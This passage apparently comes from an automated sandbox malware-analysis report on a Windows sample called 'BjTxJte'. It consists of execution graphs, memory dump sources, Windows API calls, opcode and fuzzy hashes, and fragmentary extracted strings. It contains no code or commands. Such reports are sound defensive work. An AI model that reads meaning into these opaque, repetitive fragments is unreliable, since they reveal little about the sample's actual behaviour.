                                                                                      Total number of Limit Nodes:3
                                                                                      execution_graph 21167 12edd88 21168 12edd9c 21167->21168 21170 12eddc1 21168->21170 21171 12ecea8 21168->21171 21172 12edf48 LoadLibraryExW 21171->21172 21174 12edfc1 21172->21174 21174->21170 21156 5345fa8 21157 5345fcc 21156->21157 21158 5345fd3 21156->21158 21162 5345ffa 21158->21162 21163 5343bbc 21158->21163 21160 5345ff0 21161 5343bbc GetCurrentThreadId 21160->21161 21161->21162 21164 5343bc7 21163->21164 21165 5346310 GetCurrentThreadId 21164->21165 21166 53462fa 21164->21166 21165->21166 21166->21160 21152 12edce0 21153 12edd28 GetModuleHandleW 21152->21153 21154 12edd22 21152->21154 21155 12edd55 21153->21155 21154->21153

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 882 12ecea8-12edf88 884 12edf8a-12edf8d 882->884 885 12edf90-12edfbf LoadLibraryExW 882->885 884->885 886 12edfc8-12edfe5 885->886 887 12edfc1-12edfc7 885->887 887->886
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012EDDC1,00000800,00000000,00000000), ref: 012EDFB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000014.00000002.1930942407.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_20_2_12e0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 2cac5503ae5500777185259a39f18ae54990f6efc44a9ae47a952b00e53d0bf4
                                                                                      • Instruction ID: fa1e633721c2c502d74d0b93327b8bb569beec61b0023f3588a93698dd1d2609
                                                                                      • Opcode Fuzzy Hash: 2cac5503ae5500777185259a39f18ae54990f6efc44a9ae47a952b00e53d0bf4
                                                                                      • Instruction Fuzzy Hash: E01123B6D003498FDB10CF9AC448ADEFBF4EB88314F10842AE919A7250C3B5A544CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 890 12edce0-12edd20 891 12edd28-12edd53 GetModuleHandleW 890->891 892 12edd22-12edd25 890->892 893 12edd5c-12edd70 891->893 894 12edd55-12edd5b 891->894 892->891 894->893
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 012EDD46
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000014.00000002.1930942407.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_20_2_12e0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: b02946dfab19e47b55183ea0efee2ee836f4b961dd55b612511cf294478a9e3b
                                                                                      • Instruction ID: ba477e504879743d43de974c1ddf90a5b5146a3d71ebd17fb5fd6a2b4d7c6861
                                                                                      • Opcode Fuzzy Hash: b02946dfab19e47b55183ea0efee2ee836f4b961dd55b612511cf294478a9e3b
                                                                                      • Instruction Fuzzy Hash: CF110FB6C002498FDB10DF9AD448ADEFBF4AF88324F10842AD518A7210C37AA545CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000014.00000002.1930276681.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_20_2_100d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 550c78f9424893dd042c3c1f97808239ceb128241db5b4a41c10d4ea34a3a00e
                                                                                      • Instruction ID: 6ccae448823c5b82925bcd79384ba2d9d9f2cabe937ae028fd8cc260b3d04a7d
                                                                                      • Opcode Fuzzy Hash: 550c78f9424893dd042c3c1f97808239ceb128241db5b4a41c10d4ea34a3a00e
                                                                                      • Instruction Fuzzy Hash: 89F06271404344AAE7118A5AD8C4B66FFE8EF45724F18C45AED884A2C6C2799844CBB1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:5.1%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:5
                                                                                      Total number of Limit Nodes:1
                                                                                      execution_graph 41513 689fa68 41515 689fa7d 41513->41515 41514 689fc92 41515->41514 41516 689fca9 GlobalMemoryStatusEx GlobalMemoryStatusEx 41515->41516 41517 689fcb8 GlobalMemoryStatusEx GlobalMemoryStatusEx 41515->41517 41516->41515 41517->41515

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2392861976
                                                                                      • Opcode ID: 63782c88eb76636c4910bd49c0d0c43d6f7a0a5a25d9dd0101b9a94f4bb2caa1
                                                                                      • Instruction ID: 6c75c0631553d0f2b2fd5f332bc777b378ef35eb0a3f0470d07b95f36b1290dc
                                                                                      • Opcode Fuzzy Hash: 63782c88eb76636c4910bd49c0d0c43d6f7a0a5a25d9dd0101b9a94f4bb2caa1
                                                                                      • Instruction Fuzzy Hash: FD321D31E1071ACFCF14EF75D89459DB7B6BF89304F1486AAD409AB224EB30AD85CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      • Opcode ID: 7002be9966332ec15f31cf9f59cabf2f55288f6eff300aa622470a66a135de28
                                                                                      • Instruction ID: 49a3fc3d8c35d2fbf13f889d319721a2c38178b1a751451fbb77d9a2847e2402
                                                                                      • Opcode Fuzzy Hash: 7002be9966332ec15f31cf9f59cabf2f55288f6eff300aa622470a66a135de28
                                                                                      • Instruction Fuzzy Hash: EB029B31B0021A8FDF54DB74D590AAEB7E2EB85304F188969D509DB394EB31EC86CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: baa7060fc12693be41d0184a8c800893f762759004a43c17730ea25049efd7e3
                                                                                      • Instruction ID: 757c4d6cf16547e9e6842940a9c8d1b672255a5dde926b69780df8f264e06fae
                                                                                      • Opcode Fuzzy Hash: baa7060fc12693be41d0184a8c800893f762759004a43c17730ea25049efd7e3
                                                                                      • Instruction Fuzzy Hash: 4462AF35B002048FEF54DB68D594AADB7F2EF84314F188469E506EB354EB35EC86CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 06dced710806a54d9ca11fdcb15259258864aeb489c686791dc15778afdd93f2
                                                                                      • Instruction ID: e9ca1c14e8cb0e704f1caa1ef1349fa22bba143dc14984d386e8a2e666156893
                                                                                      • Opcode Fuzzy Hash: 06dced710806a54d9ca11fdcb15259258864aeb489c686791dc15778afdd93f2
                                                                                      • Instruction Fuzzy Hash: 63228430F101098FDF64DB68E5847AEB7F2EB89310F288926E509EB355DA35DC85CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: dM$dM$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-292641143
                                                                                      • Opcode ID: 4253e48f5678844c70d1a6aa01aa160bdb4d984b9824c9a71b41ecbe0630abe3
                                                                                      • Instruction ID: fac4f1effea9be0e46e28a1b10932ecaf60c0c2b419c493448a922adfac4dbca
                                                                                      • Opcode Fuzzy Hash: 4253e48f5678844c70d1a6aa01aa160bdb4d984b9824c9a71b41ecbe0630abe3
                                                                                      • Instruction Fuzzy Hash: ECE16D31E102198FDF69DFA8D4806AEB7B2EF89304F14852AE505EB354DB71DC46CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q
                                                                                      • API String ID: 0-831282457
                                                                                      • Opcode ID: d9b9554ad42f0bfecfead41445b3b28fd7093a1731448b4cbb7c9e310f4ca0f6
                                                                                      • Instruction ID: ba7d8eeec5369b98e9b6434348400112b14fa5a0e6d16f5764273d70774cb33e
                                                                                      • Opcode Fuzzy Hash: d9b9554ad42f0bfecfead41445b3b28fd7093a1731448b4cbb7c9e310f4ca0f6
                                                                                      • Instruction Fuzzy Hash: BF622C31A0060ACFCB55EF68D590A5EB7E2FF84304B248A69D009DF359DB71ED4ACB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq$\Ocq
                                                                                      • API String ID: 0-3575482020
                                                                                      • Opcode ID: 000cd0f8434c14fb1c6ef78f9f60320cc5b5a663a8d0a3351e66af3e5b9b90d9
                                                                                      • Instruction ID: e820470b2be7b0d0e1281af8727a2d24bfb9cb3b2d27ec2df8afe3273b84019f
                                                                                      • Opcode Fuzzy Hash: 000cd0f8434c14fb1c6ef78f9f60320cc5b5a663a8d0a3351e66af3e5b9b90d9
                                                                                      • Instruction Fuzzy Hash: F4619030F002189FEF549FB5C8557AEBAF6EB88300F24842AE109EB395DF758D458B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq
                                                                                      • API String ID: 0-936005338
                                                                                      • Opcode ID: 38bc62e3f5f499dccf40cb7292fe0edb530efe1bb7aaebfd1228f4e374f7cf80
                                                                                      • Instruction ID: d042a5ac7ef17206ac4258cafdd5f8942395ccc28c616c6f20cb50144c374ab4
                                                                                      • Opcode Fuzzy Hash: 38bc62e3f5f499dccf40cb7292fe0edb530efe1bb7aaebfd1228f4e374f7cf80
                                                                                      • Instruction Fuzzy Hash: E3519E30F002189FEF549FB5C855BAEBBF6EF88700F20842AE105EB395DA758C018B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: cae987850034ed3654c3aa39b9094ba86beb34d8a513929b791b525d04a4b0db
                                                                                      • Instruction ID: 9c71831f274690e970961c16e142b66a3587c056491907e94cfd73b80cb3850c
                                                                                      • Opcode Fuzzy Hash: cae987850034ed3654c3aa39b9094ba86beb34d8a513929b791b525d04a4b0db
                                                                                      • Instruction Fuzzy Hash: 70419D30E006099FDF65DFA5C8546AEBBB2FF85304F248929D505EB340DB70E846CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: a6b9ca2ce8eeb8ec40c18fc30d3231f188d141c621d35e8a507509a1b4b13569
                                                                                      • Instruction ID: 05525cd5c3749fabe472671a02db619ddf9009e500b4dcd04a847690dff27949
                                                                                      • Opcode Fuzzy Hash: a6b9ca2ce8eeb8ec40c18fc30d3231f188d141c621d35e8a507509a1b4b13569
                                                                                      • Instruction Fuzzy Hash: A941DD31E006498FDF61DF65C89469EBBB2FF85300F18892AE505EB340EB70E846CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q
                                                                                      • API String ID: 0-388095546
                                                                                      • Opcode ID: 8d8a990505c12cf62a6fb8e9f51339835eb2ed4856647814f50eb6fbfed0c1e6
                                                                                      • Instruction ID: c46bf6c4a3e615ff9b4a8376583df22386042b174d6b942d326edd9b05f6a1c3
                                                                                      • Opcode Fuzzy Hash: 8d8a990505c12cf62a6fb8e9f51339835eb2ed4856647814f50eb6fbfed0c1e6
                                                                                      • Instruction Fuzzy Hash: BEF082B6E0031ACFDF688E61E9456AC7774EB02354F5C4862C905D7254E3319946E770
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \Ocq
                                                                                      • API String ID: 0-2995510325
                                                                                      • Opcode ID: 8d9869bdc6436ca3902a88eebcd0635b2ecb6fe194b877a2786b6415b978f988
                                                                                      • Instruction ID: 40a24f71bd07e9caa7a1d7340708d2d9830ea74dcef11df567be72a2a4d40181
                                                                                      • Opcode Fuzzy Hash: 8d9869bdc6436ca3902a88eebcd0635b2ecb6fe194b877a2786b6415b978f988
                                                                                      • Instruction Fuzzy Hash: 04F0B730A50129DFDF149F94E8597AEBBB2BF84700F244529E402A7294CB745D46CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 97a5124b12f2d448defa671a46890db99df046f574c36f9adacad904d4f1e875
                                                                                      • Instruction ID: 6db0f2da9571091486ad453be7acff7d20c053f0ff0738e1c82a34edd8a297aa
                                                                                      • Opcode Fuzzy Hash: 97a5124b12f2d448defa671a46890db99df046f574c36f9adacad904d4f1e875
                                                                                      • Instruction Fuzzy Hash: B961EF71F001214FDF509BB9C88466FAAD7AFC8220B19443AD90EDB364EE75DD4287D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 71e46c6667dde32e29780503b1ae3a532fcec4665504881a61cb3cbcd22e2411
                                                                                      • Instruction ID: 1300ffbaa12585710ed023bef3bdf4ba338b1253a1313dc68279edd3125d09b6
                                                                                      • Opcode Fuzzy Hash: 71e46c6667dde32e29780503b1ae3a532fcec4665504881a61cb3cbcd22e2411
                                                                                      • Instruction Fuzzy Hash: 49815C30F002099FDF54DBB9D59066EBBF6AB89304F148429D50AEB394EB34EC438B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 931c3bad041f96b8172e35e2b0b76c28cb880856f065a6f31f8e4833d028e5b4
                                                                                      • Instruction ID: 5f731ebe5bbf49aa0a47b48dd0556df237a0d518937c60507e12f2dc6cd4dc3f
                                                                                      • Opcode Fuzzy Hash: 931c3bad041f96b8172e35e2b0b76c28cb880856f065a6f31f8e4833d028e5b4
                                                                                      • Instruction Fuzzy Hash: 33813B30F002099FDF54DBB9D59466EBBF6AF89304F148529D50AEB394EB70EC428B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 42e187e2bed5c1cf32eca24d05948326d671b1f1954b03067895e07780dd75f1
                                                                                      • Instruction ID: 5dc0fff275dcc13a43884bf147e996b77dc406e1a6c35a95bc11f399662c1672
                                                                                      • Opcode Fuzzy Hash: 42e187e2bed5c1cf32eca24d05948326d671b1f1954b03067895e07780dd75f1
                                                                                      • Instruction Fuzzy Hash: D7713B71A002099FDF59DBA8D980AADBBF6FF88304F188469E505EB355DB30ED46CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8fbff36c78a8a1fc241e763a54d47424045529d0a91f4104e76a31e9961591d8
                                                                                      • Instruction ID: 86a098f01603ce169ef4f1d984a52513790ad993b408048a859d7e1d1abc7f5b
                                                                                      • Opcode Fuzzy Hash: 8fbff36c78a8a1fc241e763a54d47424045529d0a91f4104e76a31e9961591d8
                                                                                      • Instruction Fuzzy Hash: 25711B71A002099FDF59DBA8D980AADBBF6FF84304F188469E505EB355DB30ED46CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e3146c9d8bbc403725afefca1f1b4eb0bbc591b573fc5eaba60e6b1d3ae32cfb
                                                                                      • Instruction ID: 37ee53fb61fe1281e411bda0ad1b063dab3b656540a8f24fd7e324ad1bcd0266
                                                                                      • Opcode Fuzzy Hash: e3146c9d8bbc403725afefca1f1b4eb0bbc591b573fc5eaba60e6b1d3ae32cfb
                                                                                      • Instruction Fuzzy Hash: 8851E231E00105CFDF58EBB8E4546AEBBB2EB84315F248869E206DB351DB359D45CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 274a9412c222e5d2708861341c2038c8a6b23ea83eb0d8236c283adbdd5bf104
                                                                                      • Instruction ID: 0a1a6d2d4b0a8788e0caba065d43b12e1cf80f2a9b49349629ad92169f0d111a
                                                                                      • Opcode Fuzzy Hash: 274a9412c222e5d2708861341c2038c8a6b23ea83eb0d8236c283adbdd5bf104
                                                                                      • Instruction Fuzzy Hash: CE51FC31B10315DFEF68566CD96472F2AAAD789710F14482AF70AD73D8CE79CC8583A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b63e4be3cf6af715eb3ce78d2a377fe0bab2e2c27e7563b52ffb2c52d75fc555
                                                                                      • Instruction ID: d3803fffcba0912d74f757ff4427bac6dab45f1c3fd8e712f6bf457e7290e827
                                                                                      • Opcode Fuzzy Hash: b63e4be3cf6af715eb3ce78d2a377fe0bab2e2c27e7563b52ffb2c52d75fc555
                                                                                      • Instruction Fuzzy Hash: C551C931B10314DFEF68566CD96472F269ED789710F24482AE70AD73D8CE79CC4583A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0df73efa381c2fdfd64cc56002be5c5c44b39b0a1768746d0b942b26de9c3138
                                                                                      • Instruction ID: fbfcdf83fe07ca0e5260f88447541e4b4e9efb3f06028980a9f6fc6722ba2fd8
                                                                                      • Opcode Fuzzy Hash: 0df73efa381c2fdfd64cc56002be5c5c44b39b0a1768746d0b942b26de9c3138
                                                                                      • Instruction Fuzzy Hash: D0414F71E006098FDF71CEA9D880AAFF7F2FB44310F14492AE216D7651D730E9558BA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da8279dfacd434199895e5cab73e46cee48f411c5a50469002563384cd533720
                                                                                      • Instruction ID: 5903b04874d946ecff2fe6bda9f4037f72facd7f04f6f4e07f43c42bbf08e4b4
                                                                                      • Opcode Fuzzy Hash: da8279dfacd434199895e5cab73e46cee48f411c5a50469002563384cd533720
                                                                                      • Instruction Fuzzy Hash: EE317E34E106199BCF19DF65D4646AEB7F2BF8A300F148919E906EB740DB31AD46CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4118109783.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_e9d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b7f4f3641f1ce3e3efde36fe245caf87f1cc459d302e7ebf17336fefa283e154
                                                                                      • Instruction ID: 6429c02610c8c33640018bda89c717d5b920fa7fd76ea9c8358f3c555ec27fe4
                                                                                      • Opcode Fuzzy Hash: b7f4f3641f1ce3e3efde36fe245caf87f1cc459d302e7ebf17336fefa283e154
                                                                                      • Instruction Fuzzy Hash: 1D012B3110C3549AEB205B1ACD84767FFECEF91324F18C82AED092E186C279D840CA71
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4175443730.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_6890000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d991923009d53c6042bbdb48820ca6b25e509054c7ad0061d1c68ce40bacc16a
                                                                                      • Instruction ID: 6a305b7b5b217607e41c7e5930c49d1196ef9ec710aa15b588d091b1738d5b38
                                                                                      • Opcode Fuzzy Hash: d991923009d53c6042bbdb48820ca6b25e509054c7ad0061d1c68ce40bacc16a
                                                                                      • Instruction Fuzzy Hash: 37F02432F612649BCF199964EC02A9E7335EB44224F04403AD900FB786DB359801C7C0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000019.00000002.4118109783.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_25_2_e9d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f50ddf71cad5c9525fa7c9459e6220aeee81df4a5aaf977a5bcf1a30a3d2ba65
                                                                                      • Instruction ID: 16ed998388d8f41711a202f28a0daa5268a8409f5c74de24f15c145f40cffed3
                                                                                      • Opcode Fuzzy Hash: f50ddf71cad5c9525fa7c9459e6220aeee81df4a5aaf977a5bcf1a30a3d2ba65
                                                                                      • Instruction Fuzzy Hash: D0F0C271008350AAEB108E1ADC84B62FFE8EF91338F18C85AED481E286C2799840CA71
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
